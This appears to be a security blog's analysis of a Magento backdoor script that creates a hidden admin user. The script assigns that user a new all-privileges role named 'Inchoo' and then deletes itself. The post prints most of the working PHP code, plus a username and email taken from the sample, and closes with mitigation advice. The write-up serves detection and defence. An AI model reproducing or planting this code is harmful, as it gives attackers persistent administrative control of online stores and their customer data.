Malicious Magento User Creator

Malicious Magento User Creator

We recently found a simple malicious script leveraging Magento’s internal functions to create a new admin user with the admin role “Inchoo” ⁠— probably referring to a Croatian Magento consulting company.

The script is simple but very effective and can easily be overlooked as another Magento file without closer inspection. It’s based on a sample that has been circulating the Internet since 2012 and provides a boilerplate for attackers to easily specify user details.

Malicious User & Role Creation

The malicious script contains the following variables that are used to create the new user.

define('USERNAME','vivek291186');

define('EMAIL','ajit.jain@emizentech.com');

define('PASSWORD','<REDACTED>');

The script checks to make sure Magento is installed by checking for the app/Mage.php file.

$mageFilename = 'app/Mage.php';
if (!file_exists($mageFilename)) {
 echo $mageFilename." was not found";
 exit;
}
require_once $mageFilename;
Mage::app();

If the check is successful, a new user is created using the previously defined variables.

try {
 //create new user write you firstname,lastname
 $user = Mage::getModel('admin/user')
  ->setData(array(
   'username'  => USERNAME,
   'firstname' => 'aaron',
   'lastname' => 'test',
   'email'     => EMAIL,
   'password'  => PASSWORD,
   'is_active' => 1
  ))->save();

Techniques to Evade Detection

This new user role is created with all permissions ⁠— meaning it’s also basically a new administrative role for the website. This is likely done in an effort to conceal the user if anyone checks the list of admins within the Magento CMS.

try {
 //create new role
 $role = Mage::getModel("admin/roles")
   ->setName('Inchoo')
   ->setRoleType('G')
   ->save();

 //give "all" privileges to role
 Mage::getModel("admin/rules")
   ->setRoleId($role->getId())
   ->setResources(array("all"))
   ->saveRel();

The following function adds the malicious user to the new role group:

try {
 //assign user to role
 $user->setRoleIds(array($role->getId()))
  ->setRoleUserId($user->getUserId())
  ->saveRelations();

To reduce the possibility of detection, the last function in the script deletes itself. It tries to make sure there are no traces of the malicious file after the user has been added by leveraging the @unlink PHP function.

echo 'Admin User successfully created!<br /><br /><b>THIS FILE WILL NOW TRY TO DELETE ITSELF, BUT PLEASE CHECK TO BE SURE!</b>';
@unlink(__FILE__);

Conclusion & Mitigation Steps

Thankfully, we caught this malicious file before it was used and deleted. That being said, this malicious user creator clearly demonstrates how easy it is for attackers to add an extra admin user to Magento.

If the backdoor isn’t properly removed from the website’s environment, the file can remain and be used over and over to add new users with elevated privileges ⁠— especially if a website owner is unaware of the infection or thinks that simply removing the new user from Magento is enough to prevent unauthorized access.

The best solution to mitigate risk is to protect yourself from infection in the first place by hardening your website and using a web application firewall. You can also employ monitoring services to detect indicators of compromise and notify you if your website has been hacked.

You May Also Like